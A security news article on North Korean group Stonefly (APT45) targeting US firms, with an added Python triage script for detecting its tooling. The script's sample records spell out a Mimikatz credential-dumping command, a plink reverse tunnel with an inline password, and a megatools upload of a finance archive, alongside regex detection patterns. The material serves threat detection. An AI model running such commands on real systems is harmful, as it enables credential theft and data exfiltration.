Private US companies targeted by Stonefly APT
Undeterred by the indictment issued against one of its alleged members, North Korean APT group Stonefly (aka APT45) continues to target companies in the US, Symantec threat analysts warned.
About Stonefly
Also known as Andariel and OnyxFleet, Stonefly has been linked to the Reconnaissance General Bureau (RGB), a North Korean military intelligence agency.
Assessed structure of DPRK cyber operations in 2024 (Source: Mandiant)
“APT45 relies on a mix of publicly available tools such as 3PROXY, malware modified from publicly available malware such as ROGUEEYE, and custom malware families,” Mandiant’s threat analysts previously noted.
“Like most groups of [Democratic People’s Republic of Korea] activity, APT45 malware exhibits distinct shared characteristics over time, including the re-use of code, unique custom encoding, and passwords. APT45 leverages a library of malware tools which are relatively distinct from other North Korean activity clusters.”
According to Mandiant, the group:
- Has been active since at least 2009
- Was initially engaged in espionage campaigns against government agencies and defense industries, but has since added financially motivated attacks to its repertoire
- Targeted organizations in the financial sector, nuclear-related entities, and organizations involved in health-related research
“Given available information, it is possible that APT45 is carrying out financially-motivated cybercrime not only in support of its own operations but to generate funds for other North Korean state priorities,” Mandiant analysts said, and added that there is a good possibility that the group has engaged in the development and deployment of ransomware.
The latest attacks
Symantec’s threat hunters say that in three separate intrusions against different US organizations in August 2024, the attackers were ultimately unable to deploy ransomware on the networks.
Nevertheless, they believe it likely that the attacks were financially motivated: “All the victims were private companies and involved in businesses with no obvious intelligence value.”
Attribution to Stonefly rests on Preft, a custom, persistent backdoor exclusively associated with the group, together with indicators of compromise previously tied to it.
The group also used a second backdoor (Nukebot), malicious batch files, two distinct keyloggers, and publicly available tools (Mimikatz, Sliver, Plink, Megatools, FastReverseProxy, etc.).
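Most of the tooling named above is dual-use: Plink, Megatools and FastReverseProxy are legitimate utilities, and attackers routinely rename the binaries, so a hunt that only matches file names will miss them. The script below is an added example (it is not code from Symantec's report, and the process-creation records and detection patterns in it are constructed for illustration, not published indicators for this campaign). It keys on the command-line behaviour typical of each tool (credential dumping modules, reverse SSH port forwarding with an inline password, an FRP client loading a config file, an upload to MEGA) and then raises confidence when several distinct categories appear on the same host, which is the pattern of credential theft, tunnelling and exfiltration a defender would expect ahead of an extortion attempt.

```python
import re

# Constructed sample process-creation records: (host, parent_image, command_line).
# Hypothetical data for this example, not telemetry from the reported intrusions.
SAMPLE_EVENTS = [
    ("ws-014", "explorer.exe",
     r'"C:\Users\jdoe\AppData\Local\Temp\m.exe" privilege::debug sekurlsa::logonpasswords exit'),
    ("ws-014", "cmd.exe",
     r'C:\ProgramData\p.exe -N -R 3389:127.0.0.1:3389 user@203.0.113.10 -pw Passw0rd'),
    ("srv-db1", "cmd.exe",
     r'C:\Windows\Temp\frpc.exe -c C:\Windows\Temp\frpc.ini'),
    ("srv-db1", "cmd.exe",
     r'megatools put --username user@example.invalid --password hunter2 D:\backup\finance.7z'),
    # Benign plink use (interactive SSH session, no remote forward) and an unrelated process.
    ("ws-022", "explorer.exe", r'"C:\Program Files\PuTTY\plink.exe" -ssh admin@10.0.0.5'),
    ("ws-022", "svchost.exe", r'C:\Windows\System32\notepad.exe C:\Users\asmith\notes.txt'),
]

# Behaviour-based rules. The binaries are commonly renamed, so none of these rely on the
# executable name except the FRP rule, where the config-file argument is the real tell.
# These patterns are generic for the named tools and are an assumption of this example.
RULES = {
    # Mimikatz module invocations on the command line
    "mimikatz_modules": re.compile(r"(sekurlsa::|lsadump::|privilege::debug|kerberos::)", re.I),
    # Plink remote port forward (-R listen:host:port) combined with an inline password (-pw)
    "plink_remote_tunnel": re.compile(r"\s-R\s+\d+:[\w.\-]+:\d+\s.*\s-pw\s", re.I),
    # FastReverseProxy client started with a configuration file
    "frp_client_config": re.compile(r"\bfrpc(\.exe)?\b.*\s-c\s+\S+\.(ini|toml|yaml|yml)", re.I),
    # Megatools upload to MEGA cloud storage (current and legacy command forms)
    "megatools_upload": re.compile(r"\b(megatools\s+put|megaput)\b", re.I),
}


def triage(events):
    """Return (host, rule_name, command_line) for every record that matches a rule."""
    hits = []
    for host, _parent, cmdline in events:
        for name, pattern in RULES.items():
            if pattern.search(cmdline):
                hits.append((host, name, cmdline))
    return hits


def score_hosts(hits):
    """Map each host to the set of distinct rule categories seen on it.

    A single category is a lead worth checking; two or more distinct categories on one
    host (e.g. credential dumping plus a reverse tunnel) is treated as high confidence.
    """
    by_host = {}
    for host, name, _cmdline in hits:
        by_host.setdefault(host, set()).add(name)
    return by_host


def high_confidence_hosts(events, min_categories=2):
    """Hosts on which at least `min_categories` distinct tool categories were observed."""
    scores = score_hosts(triage(events))
    return sorted(h for h, cats in scores.items() if len(cats) >= min_categories)


if __name__ == "__main__":
    for host, rule, cmdline in triage(SAMPLE_EVENTS):
        print(f"[{host}] {rule}: {cmdline}")
    print("high-confidence hosts:", high_confidence_hosts(SAMPLE_EVENTS))
```

The interactive plink session on ws-022 deliberately produces no hit: the point of matching on the remote-forward and password flags rather than on the program name is to keep legitimate administration out of the queue while still catching a renamed copy used as a tunnel. Rules like these belong in the triage layer of an EDR or SIEM, with the published IoCs layered on top; the patterns will need tuning for any environment where MEGA or FRP are sanctioned.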
“The group is likely continuing to attempt to mount extortion attacks against organizations in the US,” the analysts opined, and shared the most recent indicators of compromise.